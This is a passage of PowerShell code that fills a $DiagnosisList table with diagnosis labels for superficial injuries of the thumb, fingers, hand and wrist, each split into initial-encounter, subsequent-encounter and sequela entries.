thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of right thumb","Other superficial injuries of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of right thumb","Other superficial injuries of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of right thumb","Other superficial injuries of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of left thumb","Other superficial injuries of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of left thumb","Other superficial injuries of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of left thumb","Other superficial injuries of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of unspecified thumb","Other superficial injuries of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of unspecified thumb","Other superficial injuries of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial injuries of unspecified thumb","Other superficial injuries of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right index finger","Abrasion of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right index finger","Abrasion of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right index finger","Abrasion of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left index finger","Abrasion of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left index finger","Abrasion of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left index finger","Abrasion of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right middle finger","Abrasion of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right middle finger","Abrasion of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right middle finger","Abrasion of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left middle finger","Abrasion of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left middle finger","Abrasion of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left middle finger","Abrasion of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right ring finger","Abrasion of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right ring finger","Abrasion of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right ring finger","Abrasion of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left ring finger","Abrasion of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left ring finger","Abrasion of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left ring finger","Abrasion of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right little finger","Abrasion of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right little finger","Abrasion of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right little finger","Abrasion of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left little finger","Abrasion of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left little finger","Abrasion of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left little finger","Abrasion of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of other finger","Abrasion of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of other finger","Abrasion of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of other finger","Abrasion of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified finger","Abrasion of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified finger","Abrasion of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified finger","Abrasion of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right index finger","Blister (nonthermal) of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right index finger","Blister (nonthermal) of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right index finger","Blister (nonthermal) of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left index finger","Blister (nonthermal) of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left index finger","Blister (nonthermal) of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left index finger","Blister (nonthermal) of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right middle finger","Blister (nonthermal) of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right middle finger","Blister (nonthermal) of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right middle finger","Blister (nonthermal) of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left middle finger","Blister (nonthermal) of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left middle finger","Blister (nonthermal) of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left middle finger","Blister (nonthermal) of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right ring finger","Blister (nonthermal) of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right ring finger","Blister (nonthermal) of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right ring finger","Blister (nonthermal) of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left ring finger","Blister (nonthermal) of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left ring finger","Blister (nonthermal) of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left ring finger","Blister (nonthermal) of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right little finger","Blister (nonthermal) of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right little finger","Blister (nonthermal) of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right little finger","Blister (nonthermal) of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left little finger","Blister (nonthermal) of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left little finger","Blister (nonthermal) of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left little finger","Blister (nonthermal) of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other finger","Blister (nonthermal) of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other finger","Blister (nonthermal) of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other finger","Blister (nonthermal) of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified finger","Blister (nonthermal) of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified finger","Blister (nonthermal) of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified finger","Blister (nonthermal) of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right index finger","External constriction of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right index finger","External constriction of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right index finger","External constriction of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left index finger","External constriction of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left index finger","External constriction of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left index finger","External constriction of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right middle finger","External constriction of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right middle finger","External constriction of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right middle finger","External constriction of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left middle finger","External constriction of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left middle finger","External constriction of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left middle finger","External constriction of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right ring finger","External constriction of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right ring finger","External constriction of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right ring finger","External constriction of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left ring finger","External constriction of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left ring finger","External constriction of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left ring finger","External constriction of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right little finger","External constriction of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right little finger","External constriction of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right little finger","External constriction of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left little finger","External constriction of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left little finger","External constriction of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left little finger","External constriction of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of other finger","External constriction of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of other finger","External constriction of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of other finger","External constriction of other finger, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified finger","External constriction of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified finger","External constriction of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified finger","External constriction of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right index finger","Superficial foreign body of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right index finger","Superficial foreign body of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right index finger","Superficial foreign body of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left index finger","Superficial foreign body of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left index finger","Superficial foreign body of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left index finger","Superficial foreign body of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right middle finger","Superficial foreign body of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right middle finger","Superficial foreign body of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right middle finger","Superficial foreign body of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left middle finger","Superficial foreign body of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left middle finger","Superficial foreign body of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left middle finger","Superficial foreign body of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right ring finger","Superficial foreign body of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right ring finger","Superficial foreign body of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right ring finger","Superficial foreign body of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left ring finger","Superficial foreign body of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left ring finger","Superficial foreign body of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left ring finger","Superficial foreign body of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right little finger","Superficial foreign body of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right little finger","Superficial foreign body of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right little finger","Superficial foreign body of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left little finger","Superficial foreign body of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left little finger","Superficial foreign body of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left little finger","Superficial foreign body of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other finger","Superficial foreign body of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other finger","Superficial foreign body of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other finger","Superficial foreign body of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified finger","Superficial foreign body of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified finger","Superficial foreign body of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified finger","Superficial foreign body of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right index finger","Insect bite (nonvenomous) of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right index finger","Insect bite (nonvenomous) of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right index finger","Insect bite (nonvenomous) of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left index finger","Insect bite (nonvenomous) of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left index finger","Insect bite (nonvenomous) of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left index finger","Insect bite (nonvenomous) of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right middle finger","Insect bite (nonvenomous) of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right middle finger","Insect bite (nonvenomous) of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right middle finger","Insect bite (nonvenomous) of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left middle finger","Insect bite (nonvenomous) of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left middle finger","Insect bite (nonvenomous) of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left middle finger","Insect bite (nonvenomous) of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right ring finger","Insect bite (nonvenomous) of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right ring finger","Insect bite (nonvenomous) of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right ring finger","Insect bite (nonvenomous) of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left ring finger","Insect bite (nonvenomous) of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left ring finger","Insect bite (nonvenomous) of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left ring finger","Insect bite (nonvenomous) of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right little finger","Insect bite (nonvenomous) of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right little finger","Insect bite (nonvenomous) of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right little finger","Insect bite (nonvenomous) of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left little finger","Insect bite (nonvenomous) of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left little finger","Insect bite (nonvenomous) of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left little finger","Insect bite (nonvenomous) of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of other finger","Insect bite (nonvenomous) of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of other finger","Insect bite (nonvenomous) of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of other finger","Insect bite (nonvenomous) of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified finger","Insect bite (nonvenomous) of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified finger","Insect bite (nonvenomous) of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified finger","Insect bite (nonvenomous) of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right index finger","Other superficial bite of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right index finger","Other superficial bite of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right index finger","Other superficial bite of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left index finger","Other superficial bite of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left index finger","Other superficial bite of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left index finger","Other superficial bite of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right middle finger","Other superficial bite of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right middle finger","Other superficial bite of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right middle finger","Other superficial bite of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left middle finger","Other superficial bite of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left middle finger","Other superficial bite of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left middle finger","Other superficial bite of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right ring finger","Other superficial bite of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right ring finger","Other superficial bite of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right ring finger","Other superficial bite of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left ring finger","Other superficial bite of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left ring finger","Other superficial bite of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left ring finger","Other superficial bite of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right little finger","Other superficial bite of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right little finger","Other superficial bite of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right little finger","Other superficial bite of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left little finger","Other superficial bite of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left little finger","Other superficial bite of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left little finger","Other superficial bite of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other finger","Other superficial bite of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other finger","Other superficial bite of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other finger","Other superficial bite of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified finger","Other superficial bite of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified finger","Other superficial bite of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified finger","Other superficial bite of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right hand","Abrasion of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right hand","Abrasion of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right hand","Abrasion of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left hand","Abrasion of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left hand","Abrasion of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left hand","Abrasion of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified hand","Abrasion of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified hand","Abrasion of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified hand","Abrasion of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right hand","Blister (nonthermal) of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right hand","Blister (nonthermal) of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right hand","Blister (nonthermal) of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left hand","Blister (nonthermal) of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left hand","Blister (nonthermal) of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left hand","Blister (nonthermal) of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified hand","Blister (nonthermal) of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified hand","Blister (nonthermal) of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified hand","Blister (nonthermal) of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right hand","External constriction of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right hand","External constriction of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right hand","External constriction of right hand, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left hand","External constriction of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left hand","External constriction of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left hand","External constriction of left hand, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified hand","External constriction of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified hand","External constriction of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified hand","External constriction of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right hand","Superficial foreign body of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right hand","Superficial foreign body of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right hand","Superficial foreign body of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left hand","Superficial foreign body of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left hand","Superficial foreign body of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left hand","Superficial foreign body of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified hand","Superficial foreign body of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified hand","Superficial foreign body of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified hand","Superficial foreign body of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right hand","Insect bite (nonvenomous) of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right hand","Insect bite (nonvenomous) of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right hand","Insect bite (nonvenomous) of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left hand","Insect bite (nonvenomous) of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left hand","Insect bite (nonvenomous) of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left hand","Insect bite (nonvenomous) of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified hand","Insect bite (nonvenomous) of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified hand","Insect bite (nonvenomous) of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified hand","Insect bite (nonvenomous) of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of right hand","Other superficial bite of hand of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of right hand","Other superficial bite of hand of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of right hand","Other superficial bite of hand of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of left hand","Other superficial bite of hand of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of left hand","Other superficial bite of hand of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of left hand","Other superficial bite of hand of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of unspecified hand","Other superficial bite of hand of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of unspecified hand","Other superficial bite of hand of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hand of unspecified hand","Other superficial bite of hand of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right wrist","Abrasion of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right wrist","Abrasion of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right wrist","Abrasion of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left wrist","Abrasion of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left wrist","Abrasion of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left wrist","Abrasion of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified wrist","Abrasion of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified wrist","Abrasion of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified wrist","Abrasion of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right wrist","Blister (nonthermal) of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right wrist","Blister (nonthermal) of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right wrist","Blister (nonthermal) of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left wrist","Blister (nonthermal) of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left wrist","Blister (nonthermal) of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left wrist","Blister (nonthermal) of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified wrist","Blister (nonthermal) of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified wrist","Blister (nonthermal) of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified wrist","Blister (nonthermal) of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right wrist","External constriction of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right wrist","External constriction of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right wrist","External constriction of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left wrist","External constriction of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left wrist","External constriction of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left wrist","External constriction of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified wrist","External constriction of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified wrist","External constriction of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified wrist","External constriction of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right wrist","Superficial foreign body of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right wrist","Superficial foreign body of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right wrist","Superficial foreign body of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left wrist","Superficial foreign body of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left wrist","Superficial foreign body of left wrist, subsequent encounter") + 